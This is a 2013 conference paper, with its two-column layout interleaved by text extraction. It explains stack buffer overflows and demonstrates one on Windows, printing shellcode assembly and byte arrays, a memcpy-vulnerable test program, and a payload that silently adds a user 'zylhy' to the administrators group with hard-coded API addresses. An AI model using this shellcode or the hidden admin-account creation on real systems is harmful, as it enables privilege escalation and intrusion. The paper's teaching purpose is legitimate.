2013 International Conference on Computational and Information Sciences

Locating the address of local variables to achieve a

buffer overflow
Zhiyuan An Liu Haiyan2
Computer Science and Engineering Department, 2North China Institute of Aerospace Engineering,
North China Institute of Aerospace Engineering Computer Science and Engineering Department, HeBei
LangFang, HeBei 065000, China LangFang, 065000, [email protected]
[email protected]
Abstract—Buffer overflow is a kind of serious security
problem, it is due to lack of experience of programmers and II. THE CONCEPT OF BUFFER OVERFLOW
testing is not brought, and is a relatively common form of Buffer overflows are pointing to a buffer fill is greater
hacking attacks. This article first explains the composition of than the size of the contents of his own, this time filled with
the process in memory, the concept of a buffer overflow, and the contents of the memory cells that will override the other
analyzes the principle of buffer overflow by example, Finally,
The buffer in the program embodied in a variable, so, buffer
an example is given, which achieves a buffer overflow by
locating the address of local variables.
overflow refers to a particular variable assignment, gave
greater than the length of the contents of the variable itself,
Keywords-buffer overflow; stack frame; shellcode; so that the occurrence of overflow.
III. INSTANCES OF BUFFER OVERFLOW
I. EMBODIMENT OF THE PROGRAM IN MEMORY
First look at the following code fragment:
Program is a command sequence, the sequence explicitly void overflow˄const char * ptr, int len)
tells the computer what to do, and where to find the data {
used to operations. Once the program is loaded into Char buff [400];
memory,the computer can automatically read and execution memcpy(buff,ptr,len);
of instructions to complete the work. }
Process is a running process instance. Process layout in The value of the second parameter is the length of string
memory is shown in Figure 1. that the first parameter points to.
Code segment Low memory address When the argument "ptr" is not null and "len" is less than
Data segment 400, this code can run properly. When the overflow function
Heap segment is called, the memory stack is shown in the left of Figure 2:
First push the return address which is the next instruction
address of the overflow function; after is the stack base
Stack segment High memory DGGUHVV pointer before the call of overflow function(the original
Figure 1. Process in memory layout ebp);Next, the stack base pointer points to the stack top(ebp
points). Finally, ESP stack pointer minus the number of
• Code area: store program instructions. bytes (greater than 400) to complete the division of the
• Data area: store data which will be used when the buffer. The ebp pointer minus 400 is a local variable buff
process running. pointer.
• Heap: storage (and management) dynamically
allocated objects of the process. Heap is low to high
growth.
• Stack: storage (and management) run-time
temporary variables and function parameters. Stack
is from high to low growth.
When you run a program, usually every function call (or
procedure calls) had to re-allocate local variables, so it is
necessary to control the activity log as a style to stack, that
is, when to call a new function, new activity records are
allocated on the stack top, and when to exit when the
function call to de-allocate. Activity is recorded in the stack Figure 2. stack Vtructurebefore and afterbuffer overflow
with the program execution when the change in the call
chain to grow or shrink. Stack of activation is recorded with When len is greater than 400, the section of code will
the change of program execution to grow or shrink. produce an overflow, as shown in the right side of Figure 3-
1, the overflow data will overwrite the original ebp address

978-0-7695-5004-6/13 $26.00 © 2013 IEEE 2000

1999
DOI 10.1109/ICCIS.2013.527
and ret return address, so that they destroyed. Our vision is "Helpā: API function ShellExecute function is to run an
here: external program (or open a registered file, open a directory,
• If the buff buffer store shellcode, the first address of etc.), and control the external program. If the specified file is
shellcode instruction is the first address of buffer an executable file, the function opens this file as Āopen"
buff, as long as the first address of the buffer buff mode.
will be used to cover the ret return address, you can
find the first address of shellcode instruction. C. Shellcode tail
• To maintain the original ebp will not be overwritten Function: to restore register state; after shellcode function
by overflow data. body execution is completed, the code jumps to the specified
• After shellcode instruction execution is completed, address to continue; to use the new address to overwrite the
follow-up code should continue to be implemented, original ebp address and ret return address. Implementation:
you can use a jump instruction to perform follow-up _asm
codes. {
So program execution flow after overflow is: Instruction Popad
register EIP points to the first address of buff, which is the Add esp, 102ch
beginning of shellcode instructions, so the shellcode can be Mov edx, 0xXXXXXXXX
executed. Instructions related to completion until the Jmp edx
shellcode to jump through the jmp instruction to jump to ret }
the return address to continue.after shellcode instruction Popad command restores the original state of all general
execution is completed; Jump to ret return address to execute registers and restore stack pointer. By jmp instruction
follow-up codes. unconditionally jumps to 0xXXXXXXXX to execute code.

IV. GENERATE SHELLCODE V. BUFFER OVERFLOW IMPLEMENTATION

From the above analysis shows that, in order to achieve The process is divided into three parts to achieve. The
the effect of buffer overflow attacks, you need to write a main functions of the first part are: Write c++ code, which
shellcode instruction. We can put shellcode instructions by can add a user who belongs to administrators group, and
function into three parts to be considered. generate the executable file; The main functions of the
The first part is the shellcode head, its main function is to second part are: change the code of the first step into a binary
protect the current register state, to prepare for the encoded shellcode; The main functions of the third part are:
implementation of shellcode function body. loading the shellcode which is generate at the second step to
The second part is the shellcode function body, which achieve the corresponding functions.
implements certain functions, such as pop-up dialog box, add
A. Generate an executable file
new users.
The last part is the end of shellcode; its function is to This part is relatively simple to implement, the key point
restore the register state, the normal next instruction address. is to find the memory address of system function, and here
Also the last 4 bytes of shellcode is overwriting the return we have the help of a small tool to find the memory address
address. of API functions. It should be used API functions are:
LoadLibraryA, it belongs to kernel32.dll; ShellExecuteA, it
A. Shellcode head belongs to Shell32.dll. So you need to know the base address
Function: to allocate additional stack space in memory of kernel32.dll and Shell32.dll, then know the offset of the
for shellcode function body, and to protect the current two API functions in the dynamic link library, you can get
register state. Implementation: them to the absolute memory address, as shown in Figures 3,
_asm 4:
{
Sub esp, 1024h
Pushed
}
B. Shellcode function body
Shellcode function body can be designed according to Figure 3. LoadLibraryA memory address
any individual. For example, to add a system user belongs to
administrators group. Here need to use the system API
function ShellExecuteA, to run a console application "net" to
add a system user, net command as follows:
Add new user: net user username password /add User
belongs to group: net localgroup administrators username
/add Call execution: ShellExecuteA (0, "open", "net", net
execution parameters, SW_HIDE), where username is the
new user name, password is the user password.

2000
2001
 unsigned char ShellCodeHeader[] = { '\x81', '\xec', '\x24',
'\x10', '\x00', '\x00','\x60',};
fwrite( ShellCodeHeader, 1, sizeof( ShellCodeHeader ),
pdstf );
//*****write ShellCode function body*****
unsigned char ShellCodeBody [
SHELLCODE_BODY_LEN];
 fseek( psrcf, SHELLCODE_BODY_START,
Figure 4. ShellExecuteA memory address SEEK_SET );
 fread( ShellCodeBody,1,SHELLCODE_BODY_LEN,
The key code is as follows: psrcf );
void ShellCode() 
{ fwrite(ShellCodeBody,1,SHELLCODE_BODY_LEN,pdstf
  HMODULE hKernel32 = (HMODULE) );
0x7c800000;  //*****write ShellCode tail*****
   //The base address of Kernel32.dll unsigned char ShellCodeTail[] = { '\x61', '\x81', '\xc4',
  PVOID pFunLoadLibraryA = (PVOID) '\x2c', '\x10', '\x00', '\x00','\xba', '\x0a', '\x11', '\x40', '\x00',
0x7c801e60; '\xff','\xe2','\x90','\x90', '\x90','\x90','\x80','\xff', '\x12', '\x00',
//LoadLibraryA absolute memory address //( kernel32.dll   //base pointer before call
base address + entry Point) '\x54','\xf9','\x12','\x00' // ShellCode address};
  PVOID pFunShellExecuteA = (PVOID) fwrite( ShellCodeTail, 1, sizeof( ShellCodeTail ), pdstf );
0x7ca9f6d4;
   //ShellExecuteA absolute memory address C. Overflow Implementation
CHAR szShell32[] = { 'S','h','e','l','l','3','2','.','d','l',  The part of the code is relatively simple; the main
'l','\0' }; function calls a subroutine, passes to the subroutine the
   // loading Shell32.dll shellcode ˈ which is generated at the second step ˈ as
parameter. The key code is as follows:
HMODULE hShell32 = ((FunLoadLibraryA)   void OverFlow( unsigned char *pBuffer, INT iLen )
pFunLoadLibraryA) (szShell32);   {
 // execute shell command: net user zylhy 1234 /add   CHAR TempBuffer[ 450];
 CHAR szOperation [] = {þoÿ,'p','e','n','\0ÿ};   memcpy( TempBuffer, pBuffer, iLen );
 CHAR szFileName [] = {þnÿ,'e','t','\0ÿ};   }
CHAR szParametersOne[] = {   int main( )
'u','s','e','r','\x20','z','y','l','h','y','\x20','1','2','3','4','\x20','/','a','d','d   {
','\0' };   unsigned char recbuf[ 1024];
((FunShellExecuteA) pFunShellExecuteA)(NULL,   FILE *pf = NULL;
szOperation, szFileName, szParametersOne, NULL,   if( (pf=fopen(Āshellcode.shcā, "r+b" )) == NULL
SW_HIDE); )
//Elevated privileges: net localgroup administrators zylhy   return -1;
add   int ircount = fread( recbuf, 1,1024, pf );
CHAR szParametersTwo[] = {   OverFlow( recbuf, ircount );
'l','o','c','a','l','g','r','o','u','p','\x20','a','d','m','i','n','i','s','t','r','a','t','o printf("overflow successfully ʽ Press any key to
','r','s','\x20','z','y','l','h','y','\x20','/','a','d','d','\0' }; continue.\n");
((FunShellExecuteA) pFunShellExecuteA)(NULL,   return 0;
szOperation, szFileName, szParametersTwo, NULL, }
SW_HIDE);
} VI. SUMMARY
B. Generate Shellcode From the above analysis and examples we can see that
when the programmer in writing programs have the
This section needs to write shellcode header , shellcode responsibility and obligation to develop a security program
tail, and the executable file which is generated at the first ideas, should be familiar to those who may have a function
step to a shellcode.shc file. For the head and tail can of buffer overflow vulnerabilities, clearly those to be careful
disassemble the assembly code in the fourth quarter to get its to use the programming function. In the software testing
byte code, and for the first step of the executable file, just phase, testers devoted to the program for each buffer bounds
open the executable file, read out to a char array, then write checking and overflow detection. However, due to lack of
the contents of the array to shellcode.shc file. The key code experience and testing of the programmer's work is not
is as follows: comprehensive enough, it is still impossible to completely
//*****write ShellCode Header***** avoid buffer overflow vulnerability, these vulnerabilities

2001
2002
have been used and the software being is developed, there is [4] LIN Qing-yang; WU Dong-ying. Design and implementation of
still a possibility, but also in the use of software , doing it in model for positioning vulnerable function in buffer overflow[J],
Computer Engineering and Design. 2010-16-017.
real-time monitoring.
[5] WEI Li-feng; JIANG Rong; ZHAO Dong; Research for resisting
buffer overflow attack technologies of Vista[J]. Application Research
ACKNOWLEDGMENT of Computers, 2010-05-072.
We would like to thank the anonymous reviewers for [6] JIANG Jianhui1; ZHANG Liyuan1; JIN Tao2; CHEN Chuan2,
their valuable comments. This research is supported by the Dynamic Buffer Overflow Prevention Based on k Circular Random
Langfang research and development projects for scientific Sequence. Journal of Tongji University(Natural Science), 2010-06-
025.
and technological (2012011009&&2012011012&&
2012011013). [7] CHENG Hongrong, QIN Zhiguang, WAN Mingcheng, DENG Wei .
On the Buffer Overflow Attack Mode and Countermeasures[J]
Journal of University of Electronic Science and Technology of China,
2007-06-011
[8] Wu Xueyang; Fan Long; Chen Jingbo. Research On the Key
REFERENCES techniques of Buffer overflow under Windows System[J]. Network
[1] MA Yi-nan; ZHANG Li-he. Buffer Overflow Protection Mechanism Security Technology & Application. 2010-12-023 .
and Bypass Technology Under Windows [J]. Computer Engineering, [9] Sun Wenhao. Buffer overflow security risks [J] Network Security
2010-17-051 Technology & Application, 2010-05-004
[2] CHEN Hao. Analysis and Detection of Heap Buffer Overflow under [10] DING Yong-Shang. Solutions to Buffer Overflow Leak[J]. Computer
Windows [J] . Modern Computer. 2010-12-016 . Systems & Applications. 2010-02-047..
[3] ZHANG Zhi-gang; ZHOU Ning; NIU Shuang-xia; MO Jian-song;
LIU Hao. Remote Buffer Overflow Attack and Prevention. Journal of
Chongqing University of Technology(Natural Science), 2010-11-018.

2002
2003